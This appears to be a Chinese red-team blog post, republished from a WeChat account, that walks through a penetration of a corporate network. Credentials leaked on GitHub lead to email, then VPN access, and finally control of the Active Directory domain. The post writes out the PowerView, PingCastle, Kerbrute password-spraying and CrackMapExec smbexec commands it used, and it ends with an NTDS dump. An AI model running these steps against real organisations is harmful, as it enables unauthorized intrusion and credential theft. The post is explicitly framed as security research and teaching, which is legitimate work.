从 Github 泄露到拨入 V*N 拿到域控

admin

139018
文章

114
评论

2021年6月30日00:59:42评论105 views字数 2266阅读7分33秒阅读模式

渗透攻击红队

一个专注于红队攻击的公众号

大家好，这里是 渗透攻击红队 的第 60 篇文章，本公众号会记录一些红队攻击的案例，不定时更新

前言

目标资产信息搜集的程度，决定渗透过程的复杂程度。

目标主机信息搜集的深度，决定后渗透权限持续把控。

渗透的本质是信息搜集，而信息搜集整理为后续的情报跟进提供了强大的保证。

信息搜集

Github 信息搜集

对于 Github 很多 xdm 都是用来搜索 exp，poc ... ，其实 Github 上很多东西都能够为我们红队人员所利用，比如本篇通过 Github 泄露账号信息，拨入内网拿到域控。

首先通过 Github 搜索目标资产找到了目标的资产下的账号密码：

从 Github 泄露到拨入 V*N 拿到域控

通过下载到本地，直接用泄露的 user、pass 登陆到目标邮件系统：

从 Github 泄露到拨入 V*N 拿到域控

此时通过翻阅邮件内的消息找到了 V*N 的账号密码，并成功拨入 V*N：

从 Github 泄露到拨入 V*N 拿到域控

随后直接进内网：

从 Github 泄露到拨入 V*N 拿到域控

发现域控判断该域控为 xx 的域控，为子域控！

从 Github 泄露到拨入 V*N 拿到域控

通过对该子域控进行信息搜集发现了 web 服务：

<a class="FloatLeft Nav" href="http://172.16.172.121:7000/">统一身份认证管理</a><!--xxxxx,passwrod-->

通过域内用户枚举和密码喷洒攻击（Password Spraying）成功登陆：

从 Github 泄露到拨入 V*N 拿到域控

继续进行内网资产发现主域控CN=xxxx-DC-2ND.xxxx.com.cn  172.16.172.81   12-34-56-78-9A-BC xxxx-DC-2nd.xxxx.com.cn [Win 2016 Standard 14393]CN=xxxx-DC-1ST.xxxx.com.cn  172.16.172.80   12-34-56-78-9A-BC xxxx-DC-1st.xxxx.com.cn [Win 2016 Standard 14393]
子域控Found 172.16.172.82 IS_LDAP  172.16.172.82   12-34-56-78-9A-BC xxxx-JG-DC-1st.aaaa.xxxx.com.cn [Win 2016 Standard 14393]Found 172.16.172.81 IS_LDAPFound 172.16.172.83 IS_LDAP  172.16.172.83   12-34-56-78-9A-BC xxxx-JG-DC-2nd.aaaa.xxxx.com.cn [Win 2016 Standard 14393]

直接通过凭证连接：

从 Github 泄露到拨入 V*N 拿到域控

连接到总部：

从 Github 泄露到拨入 V*N 拿到域控

通过ldap导出机器，用户，域管，dc

Powerview 导出：
Get-NetDomainTrust -Domain xxxx.com.cn -DomainController 172.16.172.80 -ADSpath "LDAP://DC=xxxx,DC=com,DC=cn" -Credential $credGet-NetGroup -Domain xxxx.com.cn -DomainController 172.16.172.80 -ADSpath "LDAP://DC=xxxx,DC=com,DC=cn" -Credential $cred | fl name > group.txtGet-NetComputer -Domain xxxx.com.cn -DomainController 172.16.172.80 -ADSpath "LDAP://DC=xxxx,DC=com,DC=cn" -Credential $cred | fl nameGet-NetUser -Domain xxxx.com.cn -DomainController 172.16.172.80 -ADSpath "LDAP://DC=xxxx,DC=com,DC=cn" -Credential $cred | fl name
PingCastle.exe --server 172.16.172.80 --user xxxxADadmin --password xxxx --protocol ADWSThenLDAP --healthcheck --explore-trust --explore-forest-trust

从 Github 泄露到拨入 V*N 拿到域控

针对域内用户，进行密码喷洒，尝试看看有没有相同的，通过域内用户枚举和密码喷洒攻击(Password Spraying) 发现有问题，暂时不用！

接下来的思路通过域外枚举域内：

kerbrute_windows_amd64.exe userenum --dc 172.16.172.80  -d xxxx.com.cn user.txtkerbrute_windows_amd64.exe passwordspray --dc 172.16.172.80  -d xxxx.com.cn user.txt xxxx

从 Github 泄露到拨入 V*N 拿到域控

从 Github 泄露到拨入 V*N 拿到域控
拿到域管后：

crackmapexec.exe -d xxxx -u ADadmin -p xxxx -t 10 172.16.172.0/24crackmapexec.exe -d rootkit -u administrator -p admin!@#45 -t 1 192.168.3.144 --execm smbexec -x "whoami /user"crackmapexec.exe -d xxxx -u ADadmin -p xxxx -t 10 ip.txt --execm smbexec -x "whoami /user"

从 Github 泄露到拨入 V*N 拿到域控

进入内网，上线直接横向域控，导出 ntds ... ... 至此域已经拿下，本次渗透结束！

从 Github 泄露到拨入 V*N 拿到域控

渗透攻击红队

一个专注于渗透红队攻击的公众号

点分享

点点赞

点在看

本文始发于微信公众号（渗透攻击红队）：从 Github 泄露到拨入 V*N 拿到域控

免责声明:文章中涉及的程序(方法)可能带有攻击性，仅供安全研究与教学之用，读者将其信息做其他用途，由读者承担全部法律及连带责任，本站不承担任何法律及连带责任；如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截，联系方式见首页)，望知悉。

左青龙
微信扫一扫

右白虎
微信扫一扫

从 Github 泄露到拨入 V*N 拿到域控

记一次Druid Monitor漏洞日常渗透

HTB - nocturnal

渗透测试 | 某系统三连shell

2025年LLM应用十大安全风险！OWASP最新指南

election

当心你的 AI！使用 Replit AI 掩盖你的 C2 流量

HTB-CozyHosting 红队靶机三阶渗透思维突破：Cookie伪造+命令注入组合拳

【vulhub】 GoldenEye

MCP带来的新型安全威胁

一次有趣的前端加密对抗分享

发表评论

在线咨询

微信